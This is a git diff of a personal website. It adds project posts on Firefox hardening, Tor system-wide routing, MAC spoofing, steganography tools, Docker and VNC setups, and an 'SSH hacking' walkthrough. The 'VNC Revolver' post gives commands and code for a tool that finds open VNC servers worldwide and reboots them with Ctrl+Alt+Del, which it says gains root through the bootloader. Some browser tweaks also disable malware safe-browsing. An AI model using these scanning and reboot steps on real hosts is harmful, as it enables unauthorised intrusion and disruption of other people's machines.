@@ + sudo iptables -t nat -D OUTPUT -p tcp -m owner --uid-owner USERAQUI -m tcp -j REDIRECT --to-ports 9040 + sudo iptables -t nat -D OUTPUT -p udp -m owner --uid-owner USERAQUI -m udp --dport 53 -j REDIRECT --to-ports 53 + sudo iptables -t filter -D OUTPUT -p tcp -m owner --uid-owner USERAQUI -m tcp --dport 9040 -j ACCEPT + sudo iptables -t filter -D OUTPUT -p udp -m owner --uid-owner USERAQUI -m udp --dport 53 -j ACCEPT + sudo iptables -t filter -D OUTPUT -m owner --uid-owner USERAQUI -j DROP diff --git a/download/vncrevolver.zip b/download/vncrevolver.zip new file mode 100644 index 0000000..c9fb3d8 Binary files /dev/null and b/download/vncrevolver.zip differ diff --git a/download/void.sh b/download/void.sh new file mode 100644 index 0000000..e79cd9f --- /dev/null +++ b/download/void.sh @@ -0,0 +1 @@ +docker pull voidlinux/voidlinux diff --git a/haunt.scm b/haunt.scm index 5b5e320..6c6031b 100644 --- a/haunt.scm +++ b/haunt.scm @@ -25,14 +25,14 @@ (define home-page (static-page "Home" - "https://cristiancmoises.github.io/site/index.html" + "/index.html" `(,(centered-image "images/mainframe_256x256.gif")))) ;; Static "About" page (define about-page (static-page "About" - "https://cristiancmoises.github.io/site/about.html" + "/about.html" `((h1 "About") (p "This is the personal website of Cristian Cezar Moisรฉs." " I am a student. (Pronouns: " @@ -76,16 +76,16 @@ (br) (h2 "Return " ,(link* "Home" - "https://cristiancmoises.github.io/site/") + "/") "?")))) -;; Collection of miscellaneous posts -(define %misc - `(("Recent Posts" "https://cristiancmoises.github.io/site/misc.html" ,misc-posts))) +;; Collection of projects posts +(define %projects + `(("Recent Posts" "/projects.html" ,projects-posts))) ;; Collection of research-related posts (define %research - `(("Published Work" "https://cristiancmoises.github.io/site/research.html" ,research-posts))) + `(("Published Work" "/research.html" ,research-posts))) ;; Build site (site #:title @@ -97,10 +97,11 @@ #:readers (list commonmark-reader*) #:builders - (list (blog #:theme default-theme #:collections %misc) + (list (blog #:theme default-theme #:collections %projects) (blog #:theme default-theme #:collections %research) home-page about-page not-found (static-directory "css") + (static-directory "download") (static-directory "images"))) diff --git a/images/anon.gif b/images/anon.gif new file mode 100644 index 0000000..d0bb046 Binary files /dev/null and b/images/anon.gif differ diff --git a/images/brute.png b/images/brute.png new file mode 100644 index 0000000..8577b4d Binary files /dev/null and b/images/brute.png differ diff --git a/images/clean.png b/images/clean.png new file mode 100644 index 0000000..2624e9c Binary files /dev/null and b/images/clean.png differ diff --git a/images/dark.png b/images/dark.png new file mode 100644 index 0000000..3de1c73 Binary files /dev/null and b/images/dark.png differ diff --git a/images/dockervm.png b/images/dockervm.png new file mode 100644 index 0000000..befb87a Binary files /dev/null and b/images/dockervm.png differ diff --git a/images/faster1.png b/images/faster1.png new file mode 100644 index 0000000..3741eae Binary files /dev/null and b/images/faster1.png differ diff --git a/images/faster2.png b/images/faster2.png new file mode 100644 index 0000000..e35f0dc Binary files /dev/null and b/images/faster2.png differ diff --git a/images/faster3.png b/images/faster3.png new file mode 100644 index 0000000..f7ed25b Binary files /dev/null and b/images/faster3.png differ diff --git a/images/faster4.png b/images/faster4.png new file mode 100644 index 0000000..9209ae8 Binary files /dev/null and b/images/faster4.png differ diff --git a/images/go.png b/images/go.png new file mode 100644 index 0000000..6803a12 Binary files /dev/null and b/images/go.png differ diff --git a/images/mainframe_256x256.gif b/images/mainframe_256x256.gif new file mode 100644 index 0000000..9f7f6dd Binary files /dev/null and b/images/mainframe_256x256.gif differ diff --git a/images/mask.png b/images/mask.png new file mode 100644 index 0000000..43264c1 Binary files /dev/null and b/images/mask.png differ diff --git a/images/open.png b/images/open.png new file mode 100644 index 0000000..dde37af Binary files /dev/null and b/images/open.png differ diff --git a/images/open1.png b/images/open1.png new file mode 100644 index 0000000..e82c24a Binary files /dev/null and b/images/open1.png differ diff --git a/images/open2.png b/images/open2.png new file mode 100644 index 0000000..75b60c0 Binary files /dev/null and b/images/open2.png differ diff --git a/images/paranoid.png b/images/paranoid.png new file mode 100644 index 0000000..920682d Binary files /dev/null and b/images/paranoid.png differ diff --git a/images/profile.png b/images/profile.png new file mode 100644 index 0000000..f85c673 Binary files /dev/null and b/images/profile.png differ diff --git a/images/revolver.png b/images/revolver.png new file mode 100644 index 0000000..0a9fd6f Binary files /dev/null and b/images/revolver.png differ diff --git a/images/snow.png b/images/snow.png new file mode 100644 index 0000000..c464c81 Binary files /dev/null and b/images/snow.png differ diff --git a/images/st.png b/images/st.png new file mode 100644 index 0000000..f147815 Binary files /dev/null and b/images/st.png differ diff --git a/images/steg.gif b/images/steg.gif new file mode 100644 index 0000000..d63b5df Binary files /dev/null and b/images/steg.gif differ diff --git a/images/steghide.png b/images/steghide.png new file mode 100644 index 0000000..19f2ac6 Binary files /dev/null and b/images/steghide.png differ diff --git a/images/stegoshare.png b/images/stegoshare.png new file mode 100644 index 0000000..22b247b Binary files /dev/null and b/images/stegoshare.png differ diff --git a/images/stegroute.png b/images/stegroute.png new file mode 100644 index 0000000..ae80ba8 Binary files /dev/null and b/images/stegroute.png differ diff --git a/images/tor.png b/images/tor.png new file mode 100644 index 0000000..00e22fe Binary files /dev/null and b/images/tor.png differ diff --git a/images/torando.png b/images/torando.png new file mode 100644 index 0000000..2ec64c2 Binary files /dev/null and b/images/torando.png differ diff --git a/posts/brute.md b/posts/brute.md new file mode 100644 index 0000000..5a92cac --- /dev/null +++ b/posts/brute.md @@ -0,0 +1,69 @@ +title:๐ช Brutefox +date: 2024-02-15 23:00 +tags: projects +summary: Firefox with steroids +--- +Firefox with steroids +--- +#### ๐ฌ Tutorial on Youtube [here](https://www.youtube.com/embed/FlC7b2z4kHQ) +๐ง๐ท Para o tutorial em portuguรชs clique [aqui](https://github.com/cristiancmoises/brutefox/blob/main/LEIA-ME.md) + +![brute](/images/brute.png) + +> ### START FIREFOX AND DIGIT IN THE SEARCH BOX: + about:config +_*Then press enter_ +> ### Paste the command and search, then change the value: + network.http.pipelining |True + network.http.pipelining.maxrequests |32 + network.http.proxy.pipelining |True + network.dns.disableIPv6 |True + plugin.expose_full_path |True + nglayout.initialpaint.delay |0 + content.notify.backoffcount |5 + ui.submenuDelay |0 + browser.cache.memory.capacity |32768 + layout.spellcheckDefault |2 + browser.download.animateNotifications|False + security.dialog_enable_delay |0 + network.prefetch-next |False + browser.newtabpage.activity-stream.feeds.telemetry |False + browser.newtabpage.activity-stream.telemetry |False + browser.ping-centre.telemetry |False + toolkit.telemetry.archive.enabled |False + toolkit.telemetry.bhrPing.enabled |False + toolkit.telemetry.enabled |False + toolkit.telemetry.firstShutdownPing.enabled |False + toolkit.telemetry.hybridContent.enabled |False + toolkit.telemetry.newProfilePing.enabled |False + toolkit.telemetry.reportingpolicy.firstRun |False + toolkit.telemetry.shutdownPingSender.enabled |False + toolkit.telemetry.unified |False + toolkit.telemetry.updatePing.enabled |False + reader.parse-on-load.enabled |False + reader.parse-on-load.force-enabled |False + browser.pocket.enabled |False + loop.enabled |False + +### INSTALL SOME ADDONS TO INCREASE THE SECURITY: +![image](https://github.com/cristiancmoises/brutefox/assets/86272521/f93b99c3-b7dc-40a8-8a80-9eb7bc007fe5) +[Ublock](https://addons.mozilla.org/en-US/firefox/addon/ublock-origin/) +![image](https://github.com/cristiancmoises/brutefox/assets/86272521/f9c52e17-b859-4318-80a0-8d45f26da806) +[PrivacyBadger](https://addons.mozilla.org/en-US/firefox/addon/privacy-badger17/) +![image](https://github.com/cristiancmoises/brutefox/assets/86272521/dccd79b3-c58b-404e-a30b-deba0b8abeab) +[CanvasBlocker](https://addons.mozilla.org/en-US/firefox/addon/canvasblocker/) +![image](https://github.com/cristiancmoises/brutefox/assets/86272521/cfb0b18a-bd20-4754-ad88-72ee4cd48d2c) +[BrowSec](https://addons.mozilla.org/en-US/firefox/addon/browsec/) +____________________________________________________________________ +### FOR PARANOIDS: +![image](https://github.com/cristiancmoises/brutefox/assets/86272521/e6aa98fd-6dc8-4a2f-abe5-79f822e131f5) +[NOScript](https://addons.mozilla.org/en-US/firefox/addon/noscript/) +![image](https://github.com/cristiancmoises/brutefox/assets/86272521/724a9ca5-3943-4441-8dcb-3e344a1242b8) +[LibreJS](https://ftp.gnu.org/gnu/librejs/librejs-7.21.0.xpi) +______________________________________________________________________ +### BONUS - A TRUE DARK BROWSER +![image](https://github.com/cristiancmoises/brutefox/assets/86272521/db293502-20d8-45ea-be6b-c417f6160371) +[AmoledTheme](https://addons.mozilla.org/en-US/firefox/addon/all-back-no-highlight/) +![image](https://github.com/cristiancmoises/brutefox/assets/86272521/2fcb5977-8270-48cd-9307-f363ee0bdbc3) +[DarkBG](https://addons.mozilla.org/en-US/firefox/addon/dark-background-light-text/) +_______________________________________________________________________ diff --git a/posts/clean.md b/posts/clean.md new file mode 100644 index 0000000..8d70c14 --- /dev/null +++ b/posts/clean.md @@ -0,0 +1,30 @@ +title: ๐งน Clean All +date: 2024-02-10 19:00 +tags: projects +summary: Secure delete trash, temp and free space +--- +Secure delete trash, temp and free space +--- +![clean](/images/clean.png) + +# DOWNLOAD +## [clearner.sh](/download/clearner.sh) +## [cleanall.sh](/download/cleanall.sh) +## [paranoid.sh](/download/paranoid.sh) + +### <> HOW IT WORKS: > + +- Download the cleanall.sh; +- Permission: chmod +x cleanall.sh +- Then run ./cleanall.sh +#### <> Versions: > + - cleanall.sh (Clean all + Free Disk Space [fastly]) + - cleaner.sh (Fast clean, dont clean free disk space) + - paranoid.sh (Clean all + Free Disk Space with urandom) +_______________________________________________________ + +If you want run it in reboot: +- crontab -e +- @reboot /home/Download/cleanall.sh + + > Have a nice day! :) diff --git a/posts/dockervm.md b/posts/dockervm.md new file mode 100644 index 0000000..d6ca7e8 --- /dev/null +++ b/posts/dockervm.md @@ -0,0 +1,48 @@ +title:๐ฆ DockerVM +date: 2024-02-18 00:00 +tags: projects +summary: Use docker like Qemu/VmWare/VirtualBox +--- +Use docker like Qemu/VmWare/Virtualbox +--- +![dockervm](/images/dockervm.png) + +### [Exherbo](/download/exherbo.sh) +### [Fedora](/download/fedora.sh) +### [Kali](/download/kali.sh) +### [Void](/download/void.sh) + +### ACCESS THE SYSTEM IN THE CONTAINER + docker run -it IMAGE_ID_HERE /bin/bash +### START ALL STOPPED CONTAINERS + docker start $(docker ps -a -q --filter "status=exited") +### RUN THE LAST STOPPED CONTAINER: + docker start -a -i 'docker ps -q -l' +### LIST ALL IMAGES + docker images +### LIST ALL CONTAINERS + docker ps -a +### RE-ACCESS THE SYSTEMS + docker exec -it CONTAINER_ID_HERE /bin/bash +# NOVNC +### GRAPHICAL INTERFACE + apt install xfce-desktop xorg -y +### CONFIGURE A PASSWORD FOR ROOT ON KALI +passwd +### FIREWALL - HOST CONFIG + iptables -A INPUT -i docker0 -j ACCEPT +### CONFIG FOR KALI LINUX + apt update && apt upgrade && apt install novnc x11vnc tigervnc-standalone-server dbus-x11 python-py python3-pip -y +### NUMPY INSTALL + user > pip install numpy + user > pip3 install numpy +### START DBUS + dbus-launch +### START VNCSERVER + vncserver +### START NOVNC +/usr/share/novnc/utils/novnc_proxy --listen 8081 --vnc localhost:5900 +### ACESS VIA BROWSER +CONTAINER_IP:8081/vnc.html +### FIX SOME HOSTNAME BUGS +echo $(hostname -I | cut -d\ -f1) $(hostname) | sudo tee -a /etc/hosts diff --git a/posts/fasteros.md b/posts/fasteros.md new file mode 100644 index 0000000..e251359 --- /dev/null +++ b/posts/fasteros.md @@ -0,0 +1,49 @@ +title: FasterโกOS +date: 2024-02-13 23:00 +tags: projects +summary: My Web Operating System +--- +My Web Operating System +--- +### Free. +A web operating system for you! +### Easy. +Just click [here](https://fasteros.vercel.app) and visit now. + +For the android app click[here](https://play.google.com/store/apps/details/FasterOS?id=com.faster.os) + +## Screenshots +![faster1](/images/faster1.png) + +![faster2](/images/faster2.png) + +![faster3](/images/faster3.png) + +![faster4](/images/faster4.png) + +## Description +All files are running on your local computer. Convert, play music, and more with this. +FasterOS is a web operating system created for help users in daily tasks and for help security enthusiasts and students. + +#### ๐ฅ๏ธ Run linux systems +#### โคด๏ธ Upload files +#### ๐ฅ Download files +#### ๐ Browse in built-in browser +#### ๐ผ๏ธ Convert images: bmp,gif,png,jpeg,jpg,psd,svg,tiff +#### ๐ต Convert Audio: aac,mp3,ogg,wav +#### ๐ผ Convert Sheets: xlsx,csv,numbers,ods,xls +#### ๐๏ธ Compress and extract files +#### ๐ง Learn about: Linux, Windows, Hacking, Data Security and Forensics +#### ๐ The system has a list of tutorials and hacking tools +#### ๐ Malware list for analysis +#### ๐ฎ Games and Emulators +### ๐ก๏ธ Security: +#### ๐ You can turn off your cell phone so that your settings remain saved in the app +### ๐ Privacy: +#### ๐ All data is cleared on clicking shutdown +### GOALS: +#### ๐งญ Study assistant +#### โฑ๏ธ Speed up the production process +#### ๐ Help the community +#### ๐ง๐ท Official Language + diff --git a/posts/gorilazada.md b/posts/gorilazada.md new file mode 100644 index 0000000..31ca3d2 --- /dev/null +++ b/posts/gorilazada.md @@ -0,0 +1,40 @@ +title:๐ฆ Gorilazadah +date: 2024-02-18 23:00 +tags: projects +summary: Awesome script for update and clean Windows +--- +Awesome Script for Clean and Update your Windows +--- +> Para a versรฃo em portuguรชs clique [๐ง๐ท](https://github.com/cristiancmoises/gorilazadah/blob/main/LEIA-ME.md) + +![go](/images/go.png) + +___________________ + +#### You dont have time for checking windows updates and softwares every time? +### This script is for you! + +# Download +## [Gorilazada](/download/gorilazadah.ps1) +## [Clean](/downlaod/clean.bat) + +## Usage: +In the windows gui perform the following steps: + +1.) Open the Local Group Policy Editor by hitting "Win + R" and typing: **gpedit.msc** followed by **Ctrl + Shift + Enter**. + +2.) Navigate to Computer **Configuration\Windows Settings\Scripts (Startup/Shutdown). + +3.) In the results pane, double-click Shutdown. + +4.) Select the powershell tab + +5.) In the Shutdown Properties dialog box, click **Add**. + +6.) In the Script Name box, type the path to the script, or click Browse to search **gorilazadah.ps1** in the Netlogon shared folder on the domain controller. + +7.) Now add the **clean.bat** into scripts (Configuration\Windows Settings\Scripts)(double-click Shutdown). + +All cache are cleaned by the **clean.bat** (Include all temp from Microsoft Teams) +Now all an administrator has to do is reboot the computer to perform windows updates smoothly. +The same steps can be performed in GPO to acomplish the same thing on multiple Windows machines at the same time. **#profit** diff --git a/posts/live.md b/posts/live.md new file mode 100644 index 0000000..42277bc --- /dev/null +++ b/posts/live.md @@ -0,0 +1,19 @@ +title:๐ก OpenBsd Portfolio +date: 2024-02-15 03:00 +tags: projects +summary: OpenBsd Portfolio +--- +My OpenBsd Portfolio +--- +### Creation +I needed a cool portfolio... so i created [this](https://cristiancezarmoises.vercel.app). +Well. My hacking spirit ever want learn more; then i use threejs and reactjs to create a interative portfolio (check [here](https://interativo.vercel.app)). +But it's not sufficient for me. +After a few months of hard work i finished one of my best creations: A interactive [OpenBSD portfolio](https://live-one.vercel.app) with another two websites(listed above) inside. + +# Screenshots +![open](/images/open.png) + +![open1](/images/open1.png) + +![open2](/images/open2.png) diff --git a/posts/servervm.md b/posts/servervm.md new file mode 100644 index 0000000..5aa1966 --- /dev/null +++ b/posts/servervm.md @@ -0,0 +1,23 @@ +title: ๐ฅ๏ธ ServerVM +date: 2024-02-16 19:00 +tags: projects +summary: Graphical interface for servers using VNC +--- +Graphical Interface for Servers with NoVnc +--- + apt install novnc psmisc x11vnc tigervnc-standalone-server xterm terminator wget dbus-x11 python-py python3-pip xfce4 xorg -y + +# StartVnc Server + + tigervncserver -geometry 1366x768 -xstartup /usr/bin/terminator + +# Start NOVNC + + /usr/share/novnc/utils/launch.sh --listen 8080 --vnc localhost:5901 + +# Access Your Server: + + http://SERVERIP:8080/vnc.html + +# Kill the connection: + fuser -k 8080/tcp diff --git a/posts/space.md b/posts/space.md new file mode 100644 index 0000000..bd8beb4 --- /dev/null +++ b/posts/space.md @@ -0,0 +1,50 @@ +title: ๐พ Space Invaders +date: 2024-02-15 19:00 +tags: projects +summary: SSH for hacking +--- +### Amazing tricks for hacking [SSH] +--- +![mask](/images/mask.png) +## POWER UP YOUR SEGFAULT ACCESS WITH SOME TRICKS! LET'S HACK! + +### Automation with SSH for Hacking +![tor](/images/tor.png) + +#### First steps: +Debian: | + apt update && apt upgrade && apt install sshpass pssh torsocks -y +Fedora: + dnf update && dnf upgrade && dnf install sshpass pssh tor torsocks -y +Gentoo: + emerge sshpass pssh tor torsocks + +#### START TOR! +##### SYSTEMD USERS + systemctl enable tor + systemctl start tor +##### OPENRC USERS + rc-service tor enable + rc-service tor start + +### Are you prepared? OK... start with this: + + torify sshpass -p "segfault" pssh -A -i -H "root@lsd.segfault.net:22" uname -a +### [_Tutorial YouTube_](https://www.youtube.com/embed/OqZiuoV75wQ) + +## Do you want go deep? OK... +![dark](/images/dark.png) + + +## DEEEEEEEEP TUTORIAL... +### [_Tutorial YouTube_](https://youtu.be/fTgD2YGEvrE) +Go to Segfault interactive shell [here](https://shell.segfault.net) +##### When your machine starts, do this: + ssh@lsd.segfault.net +##### Before access complete do this: + ssh@adm.segfault.net + +## And repeat to infinity! +![tunnel](https://github.com/cristiancmoises/spaceinvaders/assets/86272521/a4a527f9-b749-476c-b517-480a5f173143) + +> # Knowledge is power. Use it. diff --git a/posts/spoof.md b/posts/spoof.md new file mode 100644 index 0000000..88f45e2 --- /dev/null +++ b/posts/spoof.md @@ -0,0 +1,25 @@ +title:๐ป SpoofMac +date: 2024-02-11 23:00 +tags: projects +summary: Change mac address +--- +Change mac address on reboot +--- +![spoof](https://user-images.githubusercontent.com/86272521/158036393-e9df6c24-c152-481a-9c57-f6deee207fd8.png) + +# Download +## [SpoofMac](/download/spoofmac.sh) + [eth0](/download/eth0.sh) + [enp6s0](/download/enp6s0) + +### <> SPOOF YOUR MAC ADDRESS: > + +- *Install macchanger*; +- First run ifconfig and take your interface name; +- In the script i use: wlan0 (I created the enp6s0 script to enp6s0 interfaces) +- Download the macchanger.sh; +- chmod +x macchanger.sh +- crontab -e +- @reboot /home/Download/macchanger.sh + > Have a nice day! :) + diff --git a/posts/stego.md b/posts/stego.md new file mode 100644 index 0000000..7a28459 --- /dev/null +++ b/posts/stego.md @@ -0,0 +1,118 @@ +title:๐ต๏ธ Awesome Steganography +date: 2024-02-16 00:30 +tags: projects +summary: Awesome tools for Steganography +--- +Awesome Tools for Steganography ๐ต๏ธ +--- +_Para o tutorial em portuguรชs clique [aqui ๐ง๐ท](https://github.com/cristiancmoises/awesome-steganography/blob/main/Leia-me.md)_ +# Table Of Contents +![st](/images/st.png) + +* [`Introduction`](##Steganography?) +* [`Hidden with GUI`](#Stegoshare) +* [`Hidden with TCP`](#Steganoroute) +* [`Low file size`](#Snow) +* [`Popular Tool`](#Steghide) + +## Steganography? +> Steganography is the art and science of writing hidden messages in such a way that no-one apart from the sender and intended recipient even realizes there is a hidden message.By contrast, cryptography obscures the meaning of a message, but it does not conceal the fact that there is a message. Today, the term steganography includes the concealment of digital information within computer files. For example, the sender might start with an ordinary-looking image file, then adjust the color of every 100th pixel to correspond to a letter in the alphabetโa change so subtle that someone who isn't actively looking for it is unlikely to notice it. +The larger the cover message is (in data content termsโnumber of bits) relative to the hidden message, the easier it is to hide the letter. +Stated somewhat more formally, the objective for making steganographic encoding difficult to detect is to ensure that the changes to the carrier (the original signal) due to the injection of the payload (the signal to covertly embed) are visually (and ideally, statistically) negligible; that is to say, the changes are indistinguishable from the noise floor of the carrier. +For this reason, digital pictures (which contain large amounts of data) are used to hide messages on the Internet and on other communication media. For example: a 24-bit bitmap will have 8 bits representing each of the three color values (red, green, and blue) at each pixel. If we consider just the blue there will be 28 different values of blue. The difference between 11111111 and 11111110 in the value for blue intensity is likely to be undetectable by the human eye. Therefore, the least significant bit can be used (more or less undetectably) for something else other than color information. If we do it with the green and the red as well we can get one letter of ASCII text for every three pixels. + +# Stegoshare: +![stegoshare](/images/stegoshare.png) + +The program uses 3 least significant bits (LSB) for red and blue channels and 2 LSB for the green channel. Using lossless compression (PNG), StegoShare provides about 40% capacity (in the 250Mb images you can hide 100Mb file). +Visually images looks that there are no any files embedded, human eye cannot detect the difference. +128-bit encryption makes detecting hidden file more difficult. +## Features +> Simple and easy to use +> Works on any platform that runs Java +### Running: + apt install wget openjdk-8-jdk openjdk-8-jre + wget http://downloads.sourceforge.net/stegoshare/StegoShare.jar + java -jar StegoShare.jar +### On Gentoo: + emerge openjdk + emerge jre + wget http://downloads.sourceforge.net/stegoshare/StegoShare.jar + java -jar StegoShare.jar + +# Steganoroute: +![stegnoroute](/images/stegroute.png) + +Is a tool to send steganographed text messages to another computer over the network. The receiver must make a traceroute to the sender using the mtr program (and pressing d once to switch the display mode to the continuous graph). +This tool, the sender, creates several fake hops and makes them answer the ICMP packets (or not) to write the letters one by one on the mtr client screen. +## Features +> It can print upper and lower-case letters. +> It can print in normal or color-inverse mode. +> It can loop forever. +> It should work on your own localhost computer, on your LAN and over the Internet. +> Is uses the Sinclair ZX Spectrum (1982) font. +> You can select the TTL value on demand and therefore 'move' the text up and down the mtr graph. +#### Warning! _You can filter the IP address that should receive the traceroute. If you don't filter it, every traceroute coming out of the server will mysteriously add fake hops to any destination!You can feel the sensation of being MITMed by the top intelligence organizations in the world by using the conspiracy mode! + +## Running: + apt install git mtr python3 python-scapy + git clone https://github.com/stratosphereips/steganoroute.git + cd ./steganoroute + iptables -I INPUT -p icmp --icmp-type 8 -j DROP + python3 ./steganoroute.py -i lo -m "MATRIX has You!" -l + mtr -t yourlocalLANip +_*MTR command used to list the message_ +### On Gentoo: + emerge mtr + emerge python + emerge scapy + git clone https://github.com/stratosphereips/steganoroute.git + cd ./steganoroute + iptables -I INPUT -p icmp --icmp-type 8 -j DROP + python3 ./steganoroute.py -i lo -m "MATRIX has You!" -l + mtr -t yourlocalLANip +_*MTR command used to list the message_ + +# Snow: +![Snow](/images/snow.png) + +A lightweight tool that uses whitespace and tabs to hide information inside text files. Unlike other steganographic tools, snow does not rely on binary formats to encode secret data. This can be incredibly useful in cases where it is not possible to share large binary files. +## Features +> Produces small files +> Output text can be used on any program that accepts plain text +### Running: + apt install stegsnow + stegsnow -C -m "Encrypted Message Here" -p "angrypassword" infile outfile + stegsnow -C -p "angrypassword" outfile +### On Gentoo: + wget https://darkside.com.au/snow/snow.zip + unzip snow.zip + cd snow + make + cp snow /bin/ + snow -C -m "Encrypted Message Here" -p "angrypassword" infile outfile + snow -C -p "angrypassword" outfile + +# Steghide +![steghide](/images/steghide.png) +One of the most popular steganographic tools today. +It is a simple command line program that encodes text inside images. Steghide works by creating a random list of bits inside your dummy file and inserts your secret data in between those bits. +## Features +> Quick and easy to use +> Uses checksums to verify the integrity of data +### Running: + apt install steghide + cd steghide + steghide embed -ef topsecretfile.txt -cf photo.jpg -sf photoX.jpg + steghide extract โsf photoX.jpg +### On Gentoo: + wget https://ufpr.dl.sourceforge.net/project/steghide/steghide/0.5.1/steghide-0.5.1.zip + cd steghide + ./configure + make + make check + make install + steghide embed -ef topsecretfile.txt -cf photo.jpg -sf photoX.jpg + steghide extract โsf photoX.jpg + +![stego](/images/steg.gif) diff --git a/posts/torando.md b/posts/torando.md new file mode 100644 index 0000000..0d8f309 --- /dev/null +++ b/posts/torando.md @@ -0,0 +1,89 @@ +title:๐ก๏ธ Torando +date: 2024-02-17 19:00 +tags: projects +summary: Tor VPN on whole system +--- +Tor VPN on whole system +--- +![torando](/images/torando.png) + +๐ง๐ท Para o tutorial em portuguรชs clique [aqui](https://github.com/cristiancmoises/torando/blob/main/LEIA-ME.md) +_____________________________________________ +# Download +## [Torando](/download/torando.sh) +## [Toroff](/download/toroff.sh) + +## Do you need the tor package to run this. Instal tor first! +> DEBIAN: + + apt update && apt upgrade && apt install tor torsocks -y +> GENTOO: + + emerge tor torsocks + +> ARCH: + + pacman tor torsocks -Syu + +> OPENSUSE: + + zypper install tor torsocks -y + +## FIRST STEP - CHANGE THE CONFIG +Clone the repo and open the _torando.sh_ and change USERAQUI for your username. +Do the same on _toroff.sh_ + + git clone https://github.com/cristiancmoises/torando + cd torando + chmod +x * + nano torando.sh + +## EDIT TORRC + + nano /etc/tor/torrc + +Then paste in the end: + + VirtualAddrNetwork 10.192.0.0/10 + AutomapHostsOnResolve 1 + TransPort 9040 + DNSPort 53 + +## NOW EDIT THE RESOLV.CONF + + nano /etc/resolv.conf + +## FOR SECURITY + + chattr +i /etc/resolv.conf + +## THEN REMOVE ALL AND PASTE + nameserver 127.0.0.1 + +## FIREFOX CONFIG - NO DNS LEAK +_Go to the firefox and digit *about:config* then press enter._ + + about:config + +> #### OK, Now paste the command and search, then change the value: + network.proxy.socks_remote_dns |True + browser.safebrowsing.enabled |True + browser.safebrowsing.malware.enabled |False + +## NOW YOU CAN TURN ON THE TORANDO.SH! + cd torando + ./torando.sh +## FOR DISABLE + cd torando + ./toroff.sh + +## BONUS! EDIT YOUR BASHRC/FISH OR WHATEVER... + nano .bashrc +### INCLUDE: + alias torando="./torando.sh" + alias toroff="./offtor.sh" + + +## THAT'S ALL! +![anon](/images/anon.gif) + diff --git a/posts/vnc.md b/posts/vnc.md new file mode 100644 index 0000000..3cc5d36 --- /dev/null +++ b/posts/vnc.md @@ -0,0 +1,93 @@ +title: ๐ฅ VNC Revolver +date: 2024-02-14 19:00 +tags: projects +summary: Search for open VNC Servers +--- +Search for open VNC servers around the world +--- +![vnc](/images/revolver.png) + +# DOWNLOAD +## [vncrevolver](/download/vncrevolver.zip) + +# Table Of Contents + +* [`Dependencies`](#required) +* [`Install`](#install) +* [`Features`](#features) +* [`Usage`](#commands) + + +## Required: + pip install pydantic + pip install asyncvnc + pip install aiohttp + +# Install: + git clone https://github.com/cristiancmoises/vncrevolver + cd vncrevolver +# Features +| Some Features | +|------------------------------------------------------------------------------------| +| ๐ _Search for many open Vnc Servers around the world_ | +| ๐ _Filter by country_ | +| ๐ข _List more than one_ | +| ๐ฅ๏ธ _List by Client name_ | +| โ _Checks them for vulnerabilities by rebooting the machine via Ctrl+ALT+DEL, obtaining root access through the operating system bootloader easyly._ | + +# Commands +## BASIC: + python -m vncrevolver + +## DEEP SEARCH: + python -m vncrevolver --clientname ubuntu --count 10 + +## CTRL + ALT + DEL | CHECK + python -m vncrevolver --clientname ubuntu --count 10 --check_crt_alt_del + +## CHECK A SPECIFIC ADDRESS: + python -m vncrevolver --check_crt_alt_del 123.12.1.23:5901 + +> # START ME UP! + $ python -m vncrevolver --help + + usage: vncrevolver [-h] [--clientname CLIENTNAME] [--country COUNTRY] [--asn ASN] [--count COUNT] [--check_crt_alt_del [CHECK_CRT_ALT_DEL]] [--show_failed] [--screen_delay SCREEN_DELAY] + + optional arguments: + -h, --help show this help message and exit + --clientname CLIENTNAME + Filter by client name, note that it is case-sensitive! + --country COUNTRY Filter by ISO 3166-1 alpha-2 country code + --asn ASN Filter by ASN + --count COUNT Number of VNCs to find + --check_crt_alt_del [CHECK_CRT_ALT_DEL] + If you specify this parameter without a value, only those VNCs from the search that pass the ctrl_alt_del check will be returned. If a value is passed, it must be a VNC + address that will be checked against ctrl_alt_del. + --show_failed Return VNCs that failed the ctrl_alt_del check + --screen_delay SCREEN_DELAY + Delay between taking two screenshots in milliseconds + + +> # Use filters: + + from typing import List + from vncrevolver.search import VNC, search_filter + + hosts: List[VNC] = await search_filter(clientname='ubuntu') + for vnc in hosts: + print(vnc.ip, vnc,port) + +> # Random Search + from vncrevolver.search import VNC, search_random + vnc: VNC = await search_random() + print(vnc.ip, vnc.port) + +> # Ctrl + ALT + DEL - CHECK UP! + from vncrevolver.search import VNC, search_random + from vncrevolver.vnc import check_crt_alt_del + vnc: VNC = await search_random() + print(await check_crt_alt_del(vnc.ip, vnc.port)) + +![FollowTheWhiteRabbit](https://github.com/cristiancmoises/vncrevolver/assets/86272521/87e35e4b-499b-4651-a733-0fc993d4a985) + + diff --git a/site/-awesome-steganography.html b/site/-awesome-steganography.html new file mode 100644 index 0000000..f98941c --- /dev/null +++ b/site/-awesome-steganography.html @@ -0,0 +1,46 @@ +
Para o tutorial em portuguรชs clique [aqui ๐ง๐ท]
Steganography is the art and science of writing hidden messages in such a way that no-one apart from the sender and intended recipient even realizes there is a hidden message.By contrast, cryptography obscures the meaning of a message, but it does not conceal the fact that there is a message. Today, the term steganography includes the concealment of digital information within computer files. For example, the sender might start with an ordinary-looking image file, then adjust the color of every 100th pixel to correspond to a letter in the alphabetโa change so subtle that someone who isn't actively looking for it is unlikely to notice it. +The larger the cover message is (in data content termsโnumber of bits) relative to the hidden message, the easier it is to hide the letter. +Stated somewhat more formally, the objective for making steganographic encoding difficult to detect is to ensure that the changes to the carrier (the original signal) due to the injection of the payload (the signal to covertly embed) are visually (and ideally, statistically) negligible; that is to say, the changes are indistinguishable from the noise floor of the carrier. +For this reason, digital pictures (which contain large amounts of data) are used to hide messages on the Internet and on other communication media. For example: a 24-bit bitmap will have 8 bits representing each of the three color values (red, green, and blue) at each pixel. If we consider just the blue there will be 28 different values of blue. The difference between 11111111 and 11111110 in the value for blue intensity is likely to be undetectable by the human eye. Therefore, the least significant bit can be used (more or less undetectably) for something else other than color information. If we do it with the green and the red as well we can get one letter of ASCII text for every three pixels.
The program uses 3 least significant bits (LSB) for red and blue channels and 2 LSB for the green channel. Using lossless compression (PNG), StegoShare provides about 40% capacity (in the 250Mb images you can hide 100Mb file). +Visually images looks that there are no any files embedded, human eye cannot detect the difference. +128-bit encryption makes detecting hidden file more difficult.
Simple and easy to use +Works on any platform that runs Java
apt install wget openjdk-8-jdk openjdk-8-jre
+wget http://downloads.sourceforge.net/stegoshare/StegoShare.jar
+java -jar StegoShare.jar
emerge openjdk
+emerge jre
+wget http://downloads.sourceforge.net/stegoshare/StegoShare.jar
